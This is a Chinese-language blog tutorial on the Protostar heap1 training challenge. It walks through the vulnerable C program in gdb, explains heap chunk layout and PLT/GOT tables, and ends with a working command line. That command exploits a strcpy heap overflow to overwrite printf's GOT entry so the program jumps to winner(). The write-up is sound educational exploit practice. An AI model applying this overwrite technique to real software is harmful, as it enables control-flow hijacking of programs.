二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第1张图片

前言

这是一个系列文章,之前已经介绍过一些二进制安全的基础知识,这里就不过多重复提及,不熟悉的同学可以去看看我之前写的文章

程序静态分析

https://exploit.education/protostar/heap-one/

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第2张图片

#include 
#include 
#include 
#include 
#include 

struct internet {  #定义了一个名为 internet 的结构体
  int priority;  #定义了一个int 类型的 priority函数
  char *name;  #定义了一个 char 指针 name 函数
};

void winner()  #winner函数
{
  printf("and we have a winner @ %d\n", time(NULL));  #输出and we have a winner @ %d\n", time(NULL)
}

int main(int argc, char **argv)  #主函数,参数是从命令行里获取的
{
  struct internet *i1, *i2, *i3;  #声明了三个指针变量,i1、i2和i3,它们都是指向struct internet类型的结构体的指针

  i1 = malloc(sizeof(struct internet));  #为 internet 结构体分配内存
  i1->priority = 1;  #访问 i1 指向的结构体中的 priority,赋予1值
  i1->name = malloc(8);  #分配8个字节的内存

  i2 = malloc(sizeof(struct internet));   #为 internet 结构体分配内存
  i2->priority = 2;  #访问 i1 指向的结构体中的 priority,赋予2值
  i2->name = malloc(8);  #分配8个字节的内存

  strcpy(i1->name, argv[1]);  #将第一个命令行参数复制到 i1
  strcpy(i2->name, argv[2]);  #将第二个命令行参数复制到 i2

  printf("and that's a wrap folks!\n");  输出and that's a wrap folks!
}

主函数的分配指针看着有些复杂,我们实际调试一下就能理解了

程序动态分析

使用gdb打开程序,在第一个malloc函数处下一个断点

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第3张图片

在这里插入图片描述

我们要输入两个命令行参数才能运行程序

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第4张图片

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第5张图片

现在停在了这里,我们可以输入n执行malloc函数,为 internet 结构体分配内存,i1 和 i2 是指向这些结构体的指针

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第6张图片

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第7张图片

现在程序给我们分配了一个堆,地址是0x804a000-0x806b000,现在可以查看堆空间里的内容

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第8张图片

现在堆里只有两个数据,0x11-1,0x10是第一个mallco函数给我们分配的空间大小,为什么要减一呢,因为在这个堆中保存数据是,为了区分是否是空闲区域,都会在表示大小的值后面加一个1,+1了就说明当前空间已经被存放了数据,那这里为什么后面存放的数据都是0呢,是因为这个程序是从命令行参数里获取值然后保存的,我们运行程序时没有输入参数,所以这里都是0

而最后的0x20ff1,表示空余的堆空间的大小

输入n,执行下一个指令,然后查看堆空间

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第9张图片

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第10张图片

这里按照程序 i1->priority = 1; 访问 i1 指向的结构体中的 priority,赋予1值

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第11张图片

输入n,执行下一个指令

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第12张图片

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第13张图片

程序给我们分配8个字节的内存,0x0804a018是之后存放这8个字节的堆地址,前面标记的整数可以很方便帮助我们计算,所以第18的地址是图中圈起来的,程序会将我们输入的值,放入这里

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第14张图片

输入n,执行第二个分配堆空间的操作

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第15张图片

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第16张图片

操作逻辑是和第一个一样的,0x0804a038地址也是我们第二个参数存放的地址,也就是图片上圈起来的地方

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第17张图片

现在我们将输入的内容放入堆中

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第18张图片

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第19张图片

了解了这个程序的运作机制,现在我们可以想想怎么破解程序了

漏洞点还是出在strcpy函数身上,strcpy函数不会检查目标缓冲区的大小,很容易导致缓冲区溢出,我们可以覆盖掉第二个参数的写入地址0x0804a038,那么程序就可以在任意地址写入我们指定的值

什么是plt表与got表

这里举一个例子,我们用file工具查看文件信息可以发现

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第20张图片

他是动态链接库的,意思是从libc里调用的函数

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第21张图片

比如这里的gets函数,他不是二进制文件本身里面自带的,而从本机上的libc库中调用的,这样就能缩小文件体积

而plt表的作用是当程序需要调用一个外部函数时,它首先跳转到PLT表中寻找该函数对应的入口,PLT入口包含跳转指令,然后跳转到GOT表中的相应地址,GOT中的地址会指向解析函数,之后解析函数将实际的函数地址写入GOT表,以便后续直接跳转调用函数

实际操作一下就理解了

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第22张图片

这里puts函数的plt表地址是0x80483cc,我们可以查看这个地址

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第23张图片

然后跳转到了got表的地址,调用puts函数

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第24张图片

这里我们可以覆盖掉printf函数got表地址,让程序执行printf函数时跳转到winner函数地址

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第25张图片

破解

覆盖第二个malloc写入字符的地址,所需要的垃圾字符数

python -c "print('A'*20)"

我们可以使用echo工具来输入不可见字符,printf函数的got表地址0x8049774

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第26张图片

这里gdb将printf函数解析成了puts函数,第一个参数确定了,我们还需要winner函数的地址

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第27张图片

./heap1 "`/bin/echo -ne "AAAAAAAAAAAAAAAAAAAA\x74\x97\x04\x08"`" "`/bin/echo -ne "\x94\x84\x04\x08"`"

在这里插入图片描述

成功跳转到winner函数,这里我们也可以使用gdb查看堆空间

在这里插入图片描述

二进制安全虚拟机Protostar靶场(6)堆的简单介绍以及实战 heap1_第28张图片

原本的0x0804a038被我们改成了printf函数got表的地址,之后我们输入的第二个参数就会覆盖掉printf函数got表原本的地址,变成winner函数地址,当程序调用prinf函数时,就会跳转到winner函数

堆是一个很难的部分,为了方便入门,这篇文章只是简单的介绍了一些堆的运作机制,之后的文章再慢慢介绍其他的机制

你可能感兴趣的:(pwn,二进制安全笔记,安全,二进制安全,堆,ctf,pwn)